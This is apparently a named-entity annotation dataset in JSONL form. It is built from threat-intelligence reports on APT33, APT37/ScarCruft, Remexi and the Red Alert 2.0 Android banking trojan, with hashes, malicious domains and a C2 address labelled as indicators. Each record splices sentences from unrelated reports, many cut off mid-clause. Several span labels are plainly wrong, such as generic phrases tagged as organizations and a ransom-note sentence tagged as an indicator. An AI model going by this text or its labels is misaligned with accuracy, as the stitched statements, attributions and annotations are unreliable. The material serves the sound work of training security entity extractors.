The hijacking is achieved by adding the threat actor 's e - mail address to the Facebook Business account with Admin and Finance editor roles .", "spans": [{"start": 173, "end": 185, "label": "System"}, {"start": 215, "end": 220, "label": "Organization"}, {"start": 430, "end": 436, "label": "System"}, {"start": 456, "end": 458, "label": "System"}]} {"text": "Mitigations Stay protected from mobile malware by taking these precautions : Do not download apps from unfamiliar sites Only install apps from trusted sources Pay close attention to the permissions requested by apps Install a suitable mobile security app , such as SEP Mobile or Norton , to protect your device and data Keep your operating system up to date Make frequent backups of important data Indicators of Compromise ( IoCs ) Package names : anew.football.cup.world.com.worldcup com.coder.glancelove com.winkchat APK SHA2 : 166f3a863bb2b66bda9c76dccf9529d5237f6394721f46635b053870eb2fcc5a The publicly available backdoors and tools utilized by APT33 \u2013 including NANOCORE , NETWIRE , and ALFA Shell \u2013 are all available on Iranian hacking websites , associated with Iranian hackers , and used by other suspected Iranian threat groups . This dropper used an FTP with hardcoded credentials to receive its . 
It is therefore likely that they will try many things to compromise your mobile phone , including using zero - day attacks or unknown vulnerabilities .", "spans": [{"start": 448, "end": 484, "label": "Indicator"}, {"start": 485, "end": 518, "label": "Indicator"}, {"start": 530, "end": 594, "label": "Indicator"}, {"start": 650, "end": 655, "label": "Organization"}, {"start": 668, "end": 676, "label": "System"}, {"start": 679, "end": 686, "label": "System"}, {"start": 693, "end": 703, "label": "System"}, {"start": 778, "end": 785, "label": "Organization"}, {"start": 824, "end": 837, "label": "Organization"}, {"start": 1013, "end": 1031, "label": "Organization"}, {"start": 1035, "end": 1058, "label": "Organization"}]} {"text": "b45defca452a640b303288131eb64c485f442aae0682a3c56489d24d59439b47 d9601735d674a9e55546fde0bffde235bc5f2546504b31799d874e8c31d5b6e9 2ce54d93510126fca83031f9521e40cd8460ae564d3d927e17bd63fb4cb20edc 67b1a1e7b505ac510322b9d4f4fc1e8a569d6d644582b588faccfeeaa4922cb7 APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . FTP server was not accessible any more at the time of our . 
\u201c It appears to be the email address Will used for his profiles , \u201d the IT director replied .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 260, "end": 265, "label": "Organization"}, {"start": 278, "end": 286, "label": "Organization"}, {"start": 350, "end": 358, "label": "Organization"}, {"start": 435, "end": 443, "label": "Organization"}, {"start": 573, "end": 577, "label": "Organization"}, {"start": 608, "end": 619, "label": "Organization"}]} {"text": "1664cb343ee830fa94725fed143b119f7e2351307ed0ce04724b23469b9002f2 Loaded DEX SHA2 : afaf446a337bf93301b1d72855ccdd76112595f6e4369d977bea6f9721edf37e Domain/IP : goldncup [ . Specifically , the targeting of organizations in the aerospace and energy sectors indicates that the APT33 is likely in search of strategic intelligence capable of benefitting a government or military sponsor . Remexi boasts features that allow it to gather keystrokes, take screenshots of Windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote . Since 2021 , there have been multiple leaks of ransomware source code and builders components that are essential to creating and modifying ransomware .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 83, "end": 147, "label": "Indicator"}, {"start": 160, "end": 172, "label": "Indicator"}, {"start": 226, "end": 235, "label": "Organization"}, {"start": 240, "end": 254, "label": "Organization"}, {"start": 274, "end": 279, "label": "Organization"}, {"start": 351, "end": 361, "label": "Organization"}, {"start": 365, "end": 373, "label": "Organization"}, {"start": 384, "end": 390, "label": "Malware"}, {"start": 463, "end": 470, "label": "System"}, {"start": 619, "end": 659, "label": "Vulnerability"}]} {"text": "] com glancelove [ . 
APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military aviation capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim\u2019s . The file collected system information , and then invoked a WMI instance in the rootsecuritycenter namespace to identify security products installed on the system before dropping more data collection malware .", "spans": [{"start": 6, "end": 20, "label": "Indicator"}, {"start": 21, "end": 26, "label": "Organization"}, {"start": 39, "end": 47, "label": "Organization"}, {"start": 161, "end": 169, "label": "Organization"}, {"start": 205, "end": 213, "label": "Organization"}]} {"text": "] com autoandroidup [ . We expect APT33 activity will continue to cover a broad scope of targeted entities , and may spread into other regions and sectors as Iranian interests dictate . Remexi includes different modules that it deploys in its working directory, including configuration decryption and parsing, launching victim activity logging in a separate module, and seven threads for various espionage and auxiliary . Some hackers are motivated by the sense of achievement that comes with cracking open a major system .", "spans": [{"start": 6, "end": 23, "label": "Indicator"}, {"start": 186, "end": 192, "label": "Malware"}, {"start": 427, "end": 434, "label": "Organization"}]} {"text": "] website mobilestoreupdate [ . The Elfin espionage group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries . 
The Remexi developers seem to rely on legitimate Microsoft utilities, which we enumerate in the table below\uff1a extract.exe Deploys modules from the .cab file into the working Event Cache directory, bitsadmin.exe Fetches files from the C2 server to parse and execute . However , even though the employees work for you they may feel the companys property belongs to them , not the business , and may feel justified in theft .", "spans": [{"start": 10, "end": 31, "label": "Indicator"}, {"start": 36, "end": 41, "label": "Organization"}, {"start": 42, "end": 57, "label": "Organization"}, {"start": 64, "end": 69, "label": "Organization"}, {"start": 283, "end": 292, "label": "Organization"}, {"start": 343, "end": 354, "label": "Indicator"}, {"start": 380, "end": 384, "label": "Indicator"}, {"start": 430, "end": 443, "label": "Indicator"}, {"start": 467, "end": 469, "label": "System"}]} {"text": "] website updatemobapp [ . On May 16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" ( referred to as GroupB in this blog post ) to APT33 , operating at the behest of the Iranian government . Send exfiltrated data, taskkill.exe Ends working cycle of . Dubbing the threat actor TunnelVision , whose TTPs overlap with those of Charming Kitten and Phosphorus , the researchers observed that the group is characterized by the wide exploitation of oneday vulnerabilities in specific regions .", "spans": [{"start": 10, "end": 26, "label": "Indicator"}, {"start": 44, "end": 73, "label": "Organization"}, {"start": 180, "end": 185, "label": "Organization"}, {"start": 263, "end": 275, "label": "Indicator"}, {"start": 325, "end": 337, "label": "Organization"}, {"start": 373, "end": 388, "label": "Organization"}, {"start": 393, "end": 403, "label": "Organization"}]} {"text": "] website 107 [ . 
The Elfin group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries . Persistence modules are based on scheduled tasks and system . The request header is included in the binary as follows", "spans": [{"start": 10, "end": 17, "label": "Indicator"}, {"start": 22, "end": 33, "label": "Organization"}, {"start": 40, "end": 45, "label": "Organization"}, {"start": 272, "end": 316, "label": "Malware"}]} {"text": "] 175 [ . On May 16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" to APT33 , operating at the behest of the Iranian government . Mechanisms vary for different OS . How to locate where stack strings are decoded Every Block of stack strings ends with followed by a .", "spans": [{"start": 27, "end": 56, "label": "Organization"}, {"start": 119, "end": 124, "label": "Organization"}, {"start": 260, "end": 312, "label": "Malware"}]} {"text": "] 144 [ . APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea . In the case of old Windows versions like XP , main module events.exe runs an edited XPTask.vbs Microsoft sample script to create a weekly scheduled task for . The duration of manipulation may be temporary or longer sustained , depending on operator detection .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 161, "end": 168, "label": "System"}, {"start": 183, "end": 185, "label": "System"}, {"start": 200, "end": 210, "label": "Indicator"}, {"start": 226, "end": 236, "label": "Indicator"}, {"start": 237, "end": 246, "label": "Organization"}]} {"text": "] 26 192 [ . 
In 2017 , APT37 expanded its targeting beyond the Korean peninsula to include Japan , Vietnam and the Middle East , and to a wider range of industry verticals , including chemicals , electronics , manufacturing , aerospace , automotive and healthcare entities . For newer operating systems, events.exe creates task.xml . We have not observed indications that the group claiming to be REvil that took part in the attack on the EIB was connected to the widely known ransomware group .", "spans": [{"start": 5, "end": 12, "label": "Indicator"}, {"start": 23, "end": 28, "label": "Organization"}, {"start": 184, "end": 193, "label": "Organization"}, {"start": 196, "end": 207, "label": "Organization"}, {"start": 210, "end": 223, "label": "Organization"}, {"start": 226, "end": 235, "label": "Organization"}, {"start": 238, "end": 248, "label": "Organization"}, {"start": 253, "end": 272, "label": "Organization"}, {"start": 304, "end": 314, "label": "Indicator"}, {"start": 323, "end": 331, "label": "Indicator"}, {"start": 397, "end": 402, "label": "Organization"}, {"start": 439, "end": 442, "label": "Organization"}]} {"text": "] 64 [ . In 2017 , APT37 targeted a company in Middle East that entered into a joint venture with the North Korean government to provide telecommunications service to the country . To decrypt the configuration data, the malware uses XOR with 25-character keys such as \u201cwaEHleblxiQjoxFJQaIMLdHKz\u201d that are different for every . Additionally , different attackers may have different motivations .", "spans": [{"start": 19, "end": 24, "label": "Organization"}, {"start": 137, "end": 163, "label": "Organization"}]} {"text": "] 114 [ . While not conclusive by itself , the use of publicly available Iranian hacking tools and popular Iranian hosting companies may be a result of APT33 's familiarity with them and lends support to the assessment that APT33 may be based in Iran . 
RC4 file encryption relies on the Windows 32 CryptoAPI , using the provided value\u2019s MD5 hash as an initial . Open Babel allows users to \u201c search , convert , analyze , or store data from molecular modeling , chemistry , solid - state materials , biochemistry , or related areas , \u201d according to its website , and is used in other popular pieces of software in the science field .", "spans": [{"start": 115, "end": 132, "label": "Organization"}, {"start": 152, "end": 157, "label": "Organization"}, {"start": 224, "end": 229, "label": "Organization"}, {"start": 287, "end": 294, "label": "System"}, {"start": 298, "end": 307, "label": "System"}, {"start": 362, "end": 372, "label": "System"}]} {"text": "] 147 Red Alert 2.0 : Android Trojan targets security-seekers A malicious , counterfeit version of a VPN client for mobile devices targets security-minded victims with a RAT . North Korean defector and human rights-related targeting provides further evidence that APT37 conducts operations aligned with the interests of North Korea . Among all these random keys once the word \u201csalamati\u201d was also used, which means \u201chealth\u201d in . It has legitimate uses but is widely used by attackers to help map a network .", "spans": [{"start": 6, "end": 19, "label": "Malware"}, {"start": 22, "end": 29, "label": "System"}, {"start": 101, "end": 104, "label": "System"}, {"start": 264, "end": 269, "label": "Organization"}]} {"text": "Written by Jagadeesh Chandraiah JULY 23 , 2018 SophosLabs has uncovered a mobile malware distribution campaign that uses advertising placement to distribute the Red Alert Trojan , linking counterfeit branding of well-known apps to Web pages that deliver an updated , 2.0 version of this bank credential thief . In 2017 , APT37 targeted a Middle Eastern company that entered into a joint venture with the North Korean government to provide telecommunications service to the country ( read on for a case study ) . 
Config.ini is the file where the malware stores its encrypted configuration data.List of files to send to C2 using bitsadmin.exe from the dedicated thread: upLog.txt , upSCRLog.txt , upSpecial.txt , upFile.txt , upMSLog.txt . http://108.61.189.174 control server HTTP . The primary motivation of a hacker is money , and getting it can be done with a variety of methods .", "spans": [{"start": 47, "end": 57, "label": "Organization"}, {"start": 161, "end": 177, "label": "Malware"}, {"start": 321, "end": 326, "label": "Organization"}, {"start": 353, "end": 360, "label": "Organization"}, {"start": 439, "end": 465, "label": "Organization"}, {"start": 512, "end": 522, "label": "Indicator"}, {"start": 618, "end": 620, "label": "System"}, {"start": 627, "end": 640, "label": "Indicator"}, {"start": 668, "end": 677, "label": "Indicator"}, {"start": 680, "end": 692, "label": "Indicator"}, {"start": 695, "end": 708, "label": "Indicator"}, {"start": 711, "end": 721, "label": "Indicator"}, {"start": 724, "end": 735, "label": "Indicator"}, {"start": 738, "end": 759, "label": "Indicator"}, {"start": 775, "end": 779, "label": "Indicator"}, {"start": 810, "end": 816, "label": "Organization"}]} {"text": "The group distributing this family of malware decorates it in the branding and logos of well-known social media or media player apps , system update patches , or ( in its most recent campaign ) VPN client apps in an attempt to lure users into downloading , installing , and elevating the privileges of a Trojanized app hosted on a site not affiliated with any reputable app market or store . APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations . KtJvOXulgibfiHk is the password for uploaded zip . 
Masked Downloads A malware download , and installation , may be masked by renaming a legitimate Windows system framework such as Powershell.exe to hide from monitoring tools .", "spans": [{"start": 194, "end": 197, "label": "System"}, {"start": 392, "end": 397, "label": "Organization"}, {"start": 409, "end": 424, "label": "Organization"}, {"start": 427, "end": 442, "label": "Organization"}, {"start": 449, "end": 459, "label": "Organization"}, {"start": 523, "end": 546, "label": "Organization"}, {"start": 600, "end": 616, "label": "Indicator"}]} {"text": "Aside from the inescapable irony of disguising a security-reducing Trojan as an ostensibly security-enhancing app , and the righteous affront to the whole concept of a VPN \u2019 s purpose a Trojan so disguised inspires , this represents an escalation in the variety of app types targeted by this campaign of bankbots in disguise . APT37 distributed SLOWDRIFT malware using a lure referencing the Korea Global Forum against academic and strategic institutions located in South Korea . One of the malware threads checks in an infinite loop if the mouse button was pressed and then also increments the integer iterator . 
This article is based on research by Marcelo Rivero , Malwarebytes ' ransomware specialist , who monitors information published by ransomware gangs on their Dark Web sites .", "spans": [{"start": 327, "end": 332, "label": "Organization"}, {"start": 345, "end": 362, "label": "System"}, {"start": 419, "end": 427, "label": "Organization"}, {"start": 432, "end": 454, "label": "Organization"}, {"start": 651, "end": 665, "label": "Organization"}, {"start": 668, "end": 704, "label": "Organization"}, {"start": 745, "end": 761, "label": "Organization"}, {"start": 771, "end": 785, "label": "Organization"}]} {"text": "Red Alert Plays Dress-Up In the wild , we found Web pages designed to ( vaguely ) resemble legitimate app market pages , hosting files for download that have been disguised as a legitimate mobile application of moderately broad appeal , such as a media player or social media app . We believe a organization located in Middle East was targeted by APT37 because it had been involved with a North Korean company and a business deal went bad . If the mouse hooking function registers a button hit, it lets the screenshotting thread know about it through a global . KillNet previously claimed various links to REvil and Conti , which we were unable to verify , including :", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 347, "end": 352, "label": "Organization"}, {"start": 402, "end": 409, "label": "Organization"}, {"start": 606, "end": 611, "label": "Organization"}, {"start": 616, "end": 621, "label": "Organization"}]} {"text": "But the categories targeted by this group seem to be broadening with the inclusion of VPN software . In one instance , APT37 weaponized a video downloader application with KARAE malware that was indiscriminately distributed to South Korean victims through torrent websites . After that, it checks if the iterator divided by (captureScreenTimeOut/captureActiveWindowTimeOut) has a remainder of . 
We propose to reach an agreement and conclude a deal .", "spans": [{"start": 86, "end": 89, "label": "System"}, {"start": 119, "end": 124, "label": "Organization"}, {"start": 172, "end": 185, "label": "System"}, {"start": 395, "end": 447, "label": "Indicator"}]} {"text": "The Web page shown here on the left is hosted on a domain that seems apt : free-vpn [ . FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . In that case, it takes a . The United States is joining with allies and partners to condemn Russia \u2019s destructive cyber activities against Ukraine .", "spans": [{"start": 75, "end": 87, "label": "Indicator"}, {"start": 88, "end": 95, "label": "Organization"}, {"start": 142, "end": 147, "label": "Organization"}, {"start": 160, "end": 194, "label": "Vulnerability"}, {"start": 197, "end": 210, "label": "Vulnerability"}, {"start": 227, "end": 242, "label": "System"}, {"start": 296, "end": 313, "label": "Organization"}, {"start": 361, "end": 399, "label": "Organization"}, {"start": 408, "end": 415, "label": "Organization"}]} {"text": "] download . FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . events.exe : b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31 , c981273c32b581de824e1fd66a19a281 , GCC compiler in MinGW environment version 2.24, I386 Windows GUI EXE . 
Camouflaging itself as legitimate software , the executable is exceptionally large at 56 MB an unusual size for malware samples that may allow it to avoid detection as vendors typically avoid large file sizes .", "spans": [{"start": 13, "end": 40, "label": "Organization"}, {"start": 87, "end": 92, "label": "Organization"}, {"start": 105, "end": 139, "label": "Vulnerability"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 172, "end": 187, "label": "System"}, {"start": 214, "end": 224, "label": "Indicator"}, {"start": 227, "end": 291, "label": "Indicator"}, {"start": 294, "end": 326, "label": "Indicator"}, {"start": 329, "end": 332, "label": "System"}, {"start": 345, "end": 350, "label": "System"}, {"start": 382, "end": 389, "label": "System"}, {"start": 390, "end": 393, "label": "System"}, {"start": 394, "end": 397, "label": "System"}, {"start": 449, "end": 491, "label": "Indicator"}]} {"text": "Investigation of this domain led to additional domains that appear to have been registered for use with the campaign , but are not in use yet . In April 2017 , APT37 targeted South Korean military and government organizations with the DOGCALL backdoor and RUHAPPY wiper malware . After checking that the malware is not already installed , it unpacks HCK.cab using the Microsoft standard utility expand.exe . 
Who is the Winnti group ?", "spans": [{"start": 160, "end": 165, "label": "Organization"}, {"start": 188, "end": 196, "label": "Organization"}, {"start": 201, "end": 225, "label": "Organization"}, {"start": 235, "end": 251, "label": "System"}, {"start": 256, "end": 277, "label": "System"}, {"start": 350, "end": 357, "label": "Indicator"}, {"start": 368, "end": 377, "label": "Organization"}, {"start": 395, "end": 405, "label": "Indicator"}, {"start": 419, "end": 431, "label": "Organization"}]} {"text": "( You can find additional IoCs at the end of this article ) As you can see , the Web page uses a similar colour scheme as , and the icon design from , a legitimate VPN application ( VPN Proxy Master ) found on the Google Play store . It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations . Splitter.exe : a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff , 1ff40e79d673461cd33bd8b68f8bb5b8 , 2017.08.06 11:32:36 (GMT), I386 Windows Console EXE . 
We highly suspect the \u201c Pig network \u201d to have also been used as a bulletproof hosting service for cybercriminals who are unrelated to the Winnti group .", "spans": [{"start": 214, "end": 231, "label": "System"}, {"start": 254, "end": 259, "label": "Organization"}, {"start": 279, "end": 292, "label": "System"}, {"start": 512, "end": 524, "label": "Indicator"}, {"start": 527, "end": 591, "label": "Indicator"}, {"start": 594, "end": 626, "label": "Indicator"}, {"start": 661, "end": 668, "label": "System"}, {"start": 669, "end": 676, "label": "System"}, {"start": 677, "end": 680, "label": "System"}, {"start": 707, "end": 718, "label": "System"}, {"start": 749, "end": 776, "label": "System"}, {"start": 821, "end": 833, "label": "Organization"}]} {"text": "The fake doesn \u2019 t quite nail the app name . We assess with high confidence that APT37 acts in support of the North Korean government and is primarily based in North Korea . Exfiltration is done through the bitsadmin.exe . \u201c And his access was never shut off until today ? , \u201d asked the company \u2019s general counsel Mike Dacks .", "spans": [{"start": 81, "end": 86, "label": "Organization"}, {"start": 207, "end": 220, "label": "Indicator"}, {"start": 287, "end": 313, "label": "Organization"}, {"start": 314, "end": 324, "label": "Organization"}]} {"text": "In addition to \u201c Free VPN Master Android , \u201d we \u2019 ve observed Red Alert 2.0 Trojans in the wild disguising themselves using names like : Flash Player or Update Flash Player Android Update or Android Antivirus Chrome Update or Google Update Update Google Market WhatsApp Viber OneCoin Wallet Pornhub Tactic FlashLight or PROFlashLight Finanzonline The vast majority of in-the-wild Red Alert 2.0 samples falsely present themselves as Adobe Flash player for Android , a utility that Adobe stopped supporting years ago . 
The compilation times of APT37 malware is consistent with a developer operating in the North Korea time zone ( UTC +8:30 ) and follows what is believed to be a typical North Korean workday . The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS . They will usually have found your email address via a data breach of a third party .", "spans": [{"start": 17, "end": 40, "label": "System"}, {"start": 62, "end": 75, "label": "Malware"}, {"start": 137, "end": 149, "label": "System"}, {"start": 153, "end": 172, "label": "System"}, {"start": 173, "end": 187, "label": "System"}, {"start": 191, "end": 208, "label": "System"}, {"start": 209, "end": 222, "label": "System"}, {"start": 226, "end": 239, "label": "System"}, {"start": 240, "end": 260, "label": "System"}, {"start": 261, "end": 269, "label": "System"}, {"start": 270, "end": 275, "label": "System"}, {"start": 276, "end": 283, "label": "System"}, {"start": 284, "end": 290, "label": "System"}, {"start": 380, "end": 401, "label": "Malware"}, {"start": 432, "end": 450, "label": "System"}, {"start": 455, "end": 462, "label": "System"}, {"start": 480, "end": 485, "label": "Organization"}, {"start": 542, "end": 555, "label": "System"}, {"start": 712, "end": 716, "label": "System"}, {"start": 745, "end": 755, "label": "System"}, {"start": 774, "end": 784, "label": "System"}, {"start": 924, "end": 952, "label": "Vulnerability"}]} {"text": "Our logs show a number of simultaneous Red Alert 2.0 campaigns in operation , many ( but not all ) hosted on dynamic DNS domains . The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts . The vast majority of the users targeted by this new variant of Remexi appear to have Iranian IP . 
The infection starts with a malicious email containing a link that downloads a JS file that used to download DLL .", "spans": [{"start": 26, "end": 62, "label": "Malware"}, {"start": 209, "end": 218, "label": "Organization"}, {"start": 371, "end": 377, "label": "Malware"}, {"start": 432, "end": 518, "label": "Organization"}]} {"text": "The Red Alert Payload Once installed , the malware requests Device Administrator privileges . Similarly , APT37 targeting of a company located in Middle East in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea . Some of these appear to be foreign diplomatic entities based in the . They once attacked a game server to illicitly farm in - game currency ( \u201c gaming gold \u201d , which also has real - world value ) and stole source codes of online game projects .", "spans": [{"start": 4, "end": 21, "label": "Malware"}, {"start": 106, "end": 111, "label": "Organization"}, {"start": 370, "end": 381, "label": "Organization"}]} {"text": "If the malware obtains device administrator rights , it will be able to lock the screen by itself , expire the password , and resist being uninstalled through normal methods . Similarly , APT37 targeting of a Middle Eastern company in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea . The Remexi malware has been associated with an APT actor called Chafer by Symantec . 
As more actors enter this space , Cisco Talos is seeing an increasing number of ransomware variants emerge , leading to more frequent attacks and new challenges for cybersecurity professionals , particularly regarding actor attribution .", "spans": [{"start": 188, "end": 193, "label": "Organization"}, {"start": 224, "end": 231, "label": "Organization"}, {"start": 357, "end": 363, "label": "Malware"}, {"start": 417, "end": 423, "label": "Organization"}, {"start": 427, "end": 435, "label": "Organization"}, {"start": 472, "end": 483, "label": "Organization"}, {"start": 603, "end": 630, "label": "Organization"}]} {"text": "Device admin request from app that says it is WhatsApp The app then stays in the background listening to commands from the cybercrooks . In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company . One of the human-readable encryption keys used is . Fast forward to 2021 , we ve seen several notable attacks spanning critical infrastructures to the private sector , such as the attack on the information technology firm Kaseya , which affected up to 1,500 businesses and attempted to extort Kaseya for 70 million .", "spans": [{"start": 151, "end": 156, "label": "Organization"}, {"start": 223, "end": 235, "label": "Organization"}, {"start": 256, "end": 273, "label": "Organization"}, {"start": 395, "end": 441, "label": "Organization"}, {"start": 470, "end": 504, "label": "Organization"}, {"start": 569, "end": 575, "label": "Organization"}]} {"text": "Within some of the first of those commands , the bot typically receives a list of banks it will target . Though they have primarily tapped other tracked suspected North Korean teams to carry out the most aggressive actions , APT37 is an additional tool available to the regime , perhaps even desirable for its relative obscurity . This is probably the Latin spelling for the word \u201chealth\u201d in Farsi . 
Forbes Technology Council is an invitationonly community for worldclass CIOs , CTOs and technology executives .", "spans": [{"start": 225, "end": 230, "label": "Organization"}, {"start": 400, "end": 425, "label": "Organization"}]} {"text": "The Trojan works by creating an overlay whenever the user launches the banking application . ScarCruft is a relatively new APT group , victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania . Among the artifacts related to malware authors, we found in the binaries a .pdb path containing the Windows user name \u201cMohamadreza . The discovery of COSMICENERGY illustrates that the barriers to entry for developing offensive OT capabilities are lowering as actors leverage knowledge from prior attacks to develop new malware .", "spans": [{"start": 93, "end": 102, "label": "Organization"}, {"start": 123, "end": 132, "label": "Organization"}, {"start": 308, "end": 312, "label": "Indicator"}, {"start": 333, "end": 340, "label": "System"}, {"start": 383, "end": 395, "label": "Malware"}]} {"text": "Currently Running Applications Banking Trojans that rely on the overlay mechanism to steal information need to know what application is in the foreground . Certain details , such as using the same infrastructure and targeting , make us believe that Operation Daybreak is being done by the ScarCruft APT group . Interestingly, the FBI website for wanted cybercriminals includes two Iranians called Mohammad Reza, although this could be a common name or even a false . 
Among the IP addresses owned by Hack520 is a whole/22 IP Range which we dubbed as the \u201c PIG RANGE \u201d .", "spans": [{"start": 289, "end": 298, "label": "Organization"}, {"start": 299, "end": 308, "label": "Organization"}, {"start": 330, "end": 333, "label": "Organization"}, {"start": 499, "end": 506, "label": "Organization"}, {"start": 512, "end": 529, "label": "Indicator"}]} {"text": "They do this not only to identify whether the use of a particular app may permit them to harvest another credential , but also because each targeted app needs to have an overlay mapped to its design , so the Trojan can intercept and steal user data . Prior to the discovery of Operation Daybreak , we observed the ScarCruft APT launching a series of attacks in Operation Erebus . Activity of the Chafer APT group has been observed since at least 2015 , but based on things like compilation timestamps and C&C registration, it\u2019s possible they have been active for even . McAfee researchers will present their findings at this year 's RSA security conference in San Francisco .", "spans": [{"start": 314, "end": 327, "label": "Organization"}, {"start": 396, "end": 402, "label": "Organization"}, {"start": 570, "end": 588, "label": "Organization"}, {"start": 633, "end": 656, "label": "Organization"}]} {"text": "This quest to determine the currently running application is a hallmark of overlay malware , so we thought we \u2019 d take a closer look at how it \u2019 s done . Operation Daybreak appears to have been launched by unknown attackers to infect high profile targets through spear-phishing e-mails . Defeating Compiler-Level Obfuscations Used in APT10 Malware . 
The group , which was primarily motivated by profit , is noted for utilizing self - developed technically - proficient tools for their attacks .", "spans": [{"start": 214, "end": 223, "label": "Organization"}, {"start": 334, "end": 339, "label": "Organization"}]} {"text": "To prevent this , Android \u2019 s engineers regularly release updates that contain bug fixes designed to prevent apps from getting the list of currently running apps without explicit permission . Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails . The Carbon Black Threat Analysis Unit ( TAU ) An attacker could exploit these issues by tricking a user into opening a specially crafted PDF document or , if the user has the browser extension enabled , by visiting a malicious web page :", "spans": [{"start": 18, "end": 25, "label": "System"}, {"start": 244, "end": 249, "label": "Organization"}, {"start": 314, "end": 351, "label": "Organization"}, {"start": 354, "end": 357, "label": "Organization"}]} {"text": "With every Android update , the malware authors are forced to come up with new tricks . On occasion the APT37 directly included the ROKRAT payload in the malicious document and during other campaigns the attackers leveraged multi-stage infection processes . recently analyzed a series of malware samples that utilized compiler-level obfuscations . We prefer to keep it secret , we have no goal to destroy your business .", "spans": [{"start": 11, "end": 18, "label": "System"}, {"start": 104, "end": 109, "label": "Organization"}, {"start": 132, "end": 138, "label": "System"}, {"start": 204, "end": 213, "label": "Organization"}, {"start": 348, "end": 418, "label": "Indicator"}]} {"text": "This particular case is not an exception . In the early part of 2017 , Group123 started the \" Evil New Year \" campaign . 
For example , The Regin malware platform supports many standard protocols , including SMB.[10 ] Rocke issued wget requests from infected systems to the C2.[11 ] Siloscape connects to an IRC server for C2.[12 ]", "spans": [{"start": 71, "end": 79, "label": "Organization"}, {"start": 139, "end": 161, "label": "System"}, {"start": 207, "end": 214, "label": "System"}, {"start": 217, "end": 222, "label": "Malware"}, {"start": 230, "end": 234, "label": "System"}, {"start": 273, "end": 279, "label": "System"}, {"start": 282, "end": 291, "label": "Malware"}, {"start": 307, "end": 317, "label": "System"}, {"start": 322, "end": 328, "label": "System"}]} {"text": "The author ( s ) of this malware wrote separate subroutines that identify the operating system version and fire off methods to obtain a list of currently running applications known to work on that particular version of Android . In November 2017 , Talos observed the latest Group123 campaign of the year , which included a new version of ROKRAT being used in the latest wave of attacks . opaque predicates were applied to Turla mosquito and APT10 ANEL . In each case , CrowdStrike reviewed the relevant logs and determined there was no evidence of exploitation of CVE-2022 - 41040 for initial access .", "spans": [{"start": 219, "end": 226, "label": "System"}, {"start": 248, "end": 253, "label": "Organization"}, {"start": 338, "end": 344, "label": "System"}, {"start": 422, "end": 427, "label": "Organization"}, {"start": 428, "end": 436, "label": "Malware"}, {"start": 441, "end": 446, "label": "Organization"}, {"start": 447, "end": 451, "label": "Malware"}, {"start": 469, "end": 480, "label": "Organization"}, {"start": 564, "end": 580, "label": "Vulnerability"}]} {"text": "First , they use the built-in toolbox commands to determine what apps are running . Group123 is constantly evolving as the new fileless capability that was added to ROKRAT demonstrates . 
Another obfuscation , This article is based on research by Marcelo Rivero , Malwarebytes ' ransomware specialist , who monitors information published by ransomware gangs on their Dark Web sites .", "spans": [{"start": 84, "end": 92, "label": "Organization"}, {"start": 165, "end": 171, "label": "System"}, {"start": 246, "end": 260, "label": "Organization"}, {"start": 263, "end": 299, "label": "Organization"}, {"start": 340, "end": 356, "label": "Organization"}, {"start": 366, "end": 380, "label": "System"}]} {"text": "If that doesn \u2019 t work , they try to use queryUsageStats : When the malware invokes queryUsageStats , it asks for the list of applications that ran in the last 1 million milliseconds ( 16 minutes and 40 seconds ) . In this campaign , the Group123 used a classical HWP document in order to download and execute a previously unknown malware : NavRAT . control flow flattening , COSMICENERGY lacks discovery capabilities , which implies that to successfully execute an attack the malware operator would need to perform some internal reconnaissance to obtain environment information , such as MSSQL server IP addresses , MSSQL credentials , and target IEC-104 device IP addresses .", "spans": [{"start": 238, "end": 246, "label": "Organization"}, {"start": 264, "end": 276, "label": "System"}, {"start": 341, "end": 347, "label": "System"}, {"start": 376, "end": 388, "label": "Malware"}, {"start": 477, "end": 493, "label": "Organization"}]} {"text": "String Resources Used to Store App Data Red Alert 2.0 stores its data in an atypical location ( inside the Strings.xml file embedded in the app ) to fetch its critical data , such as the C2 address . However , we asses with medium confidence that NavRAT is linked to Group123 . was applied to APT10 ANEL and Dharma ransomware packer . 
